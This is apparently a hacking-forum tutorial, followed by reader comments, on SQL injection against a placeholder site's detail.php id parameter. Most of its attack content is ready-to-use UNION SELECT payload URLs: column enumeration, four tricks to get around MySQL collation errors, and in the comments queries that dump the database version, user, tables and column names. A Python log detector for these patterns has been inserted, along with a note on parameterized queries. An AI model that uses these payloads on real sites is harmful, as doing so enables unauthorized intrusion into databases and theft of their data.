Bypassing Illegal Mix of Collations - Tutorial by RAi Jee
We will continue our tutorials about SQL.
In this tutorial you will learn how to bypass the illegal mix of collations error.
Let's start with our regular SQL injection.
Our target:
http://www.Site.com/detail.php?id=31
First we have to count how many columns it has.
http://www.Site.com/detail.php?id=31 order by 1-- -
No error!
http://www.Site.com/detail.php?id=31 order by 4-- -
No error!
http://www.Site.com/detail.php?id=31 order by 6-- -
We got an error here:
Unknown Column '6' in 'order by'
Let's reduce the column count.
http://www.Site.com/detail.php?id=31 order by 5-- -
No error!
There are 5 columns, so let's prepare our UNION SELECT command and find the vulnerable columns.
http://www.Site.com/detail.php?id=31 and 0 Union Select 1,2,3,4,5-- -
We got 2 and 3.
Let's try to get the tables.
http://www.Site.com/detail.php?id=31 and 0 Union Select 1,concat(table_name),3,4,5 from information_schema.tables where table_schema=database()-- -
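Oops! We got an error here:
Illegal mix of collations for operation 'UNION'
The error appears because the column returned by the page's own query and table_name from information_schema use different collations. Each method below converts our value to a binary string or to another character set so that MySQL can combine the two sides.
Here are some methods we can use to bypass illegal mix of collations for operation 'UNION':
1. Using UNCOMPRESS(COMPRESS(our_query_here))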
http://www.Site.com/detail.php?id=31 and 0 Union Select 1,uncompress(compress(concat(table_name))),3,4,5 from information_schema.tables where table_schema=database()-- -
BYPASSED !!
2. Using UNHEX(HEX(our_query_here))
http://www.Site.com/detail.php?id=31 and 0 Union Select 1,unhex(hex(concat(table_name))),3,4,5 from information_schema.tables where table_schema=database()-- -
BYPASSED !!
3. Using CAST()
http://www.Site.com/detail.php?id=31 and 0 Union Select 1,cast(table_name as binary),3,4,5 from information_schema.tables where table_schema=database()-- -
BYPASSED !!
4. Using CONVERT()
http://www.Site.com/detail.php?id=31 and 0 Union Select 1,convert(table_name using ascii),3,4,5 from information_schema.tables where table_schema=database()-- -
BYPASSED !!
Some advanced options for CONVERT()
If ascii doesn't work in the CONVERT() function, we can use one of these character sets instead of ascii.
- ujis
- ucs2
- tis620
- swe7
- sjis
- macroman
- macce
- latin7
- latin5
- latin2
- koi8u
- koi8r
- keybcs2
- hp8
- geostd8
- gbk
- gb2312
- armscii8
- ascii
- cp1250
- big5
- cp1251
- cp1256
- cp1257
- cp850
- cp852
- cp866
- cp932
- dec8
- euckr
- latin1
AUTHOR: Rai Muzammal Hussain a.k.a RAi Jee
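For the defender's side of the four wrappers above, the following added example (not part of the original tutorial) flags them in web access-log request targets. The function names, severity labels and sample request targets are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Wrappers the tutorial uses to re-encode a column so UNION no longer
# raises "Illegal mix of collations".
WRAPPERS = {
    "uncompress(compress())": re.compile(r"uncompress\s*\(\s*compress\s*\("),
    "unhex(hex())": re.compile(r"unhex\s*\(\s*hex\s*\("),
    "cast(... as binary)": re.compile(r"cast\s*\([^)]*\bas\s+binary\b"),
    "convert(... using charset)": re.compile(r"convert\s*\([^)]*\busing\s+\w+"),
}
UNION_SELECT = re.compile(r"\bunion\s+(all\s+)?select\b")
METADATA = re.compile(r"\binformation_schema\b|\b(version|user|database)\s*\(")
INLINE_COMMENT = re.compile(r"/\*.*?\*/", re.S)

def normalize(raw):
    """URL-decode twice (double encoding), drop /**/ comments, fold case and whitespace."""
    text = unquote_plus(unquote_plus(raw))
    text = INLINE_COMMENT.sub(" ", text)
    return re.sub(r"\s+", " ", text).lower()

def classify(request_target):
    """Return (severity, wrapper_names) for one request target from an access log."""
    text = normalize(request_target)
    if not UNION_SELECT.search(text):
        return ("none", [])
    wrappers = [name for name, rx in WRAPPERS.items() if rx.search(text)]
    # A collation-conversion wrapper plus a metadata read is the tutorial's exact pattern.
    if wrappers and METADATA.search(text):
        return ("high", wrappers)
    return ("medium", wrappers)

# Constructed sample request targets (not taken from real logs).
SAMPLE = [
    "/detail.php?id=31",
    "/detail.php?id=31%20and%200%20Union%20Select%201,2,3,4,5--%20-",
    "/detail.php?id=31+and+0+Union+Select+1,unhex(hex(concat(table_name))),3,4,5"
    "+from+information_schema.tables+where+table_schema=database()--+-",
    "/detail.php?id=31%20and%200%20union/**/select%201,convert(table_name%20using%20latin1)"
    ",3,4,5%20from%20information_schema.tables--%20-",
    "/search.php?q=credit+union+rates",
]

if __name__ == "__main__":
    for target in SAMPLE:
        print(classify(target), target[:60])
```

A hit on `detail.php` means the `id` parameter is reaching the query as SQL text; the fix on the application side is a parameterized query or an integer cast of `id`, with this check kept as a detection signal.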
How to print database version and username in that method? Or I will just add
http://www.Site.com/detail.php?id=31 and 0 Union Select 1,uncompress(version(),compress(concat(table_name))),3,4,5 from information_schema.tables where table_schema=database()-- -
Like that?
Use this query for printing the database, version and user in one shot.
http://www.Site.com/detail.php?id=31 and 0 Union Select 1,uncompress(compress(concat(Version(),0x3a,user(),0x3a,database()))),3,4,5-- -
And if you want to dump the tables and columns too, then put this one query in the vulnerable column:
http://www.Site.com/detail.php?id=31 and 0 Union Select 1,uncompress(compress(concat(Version(),0x3a,user(),0x3a,database(),(select group_concat(column_name) from information_schema.columns where table_schema=database())))),3,4,5-- -
How to dump in WAF bypass?
I want to learn SQL injection from you, do you have any video lecture series?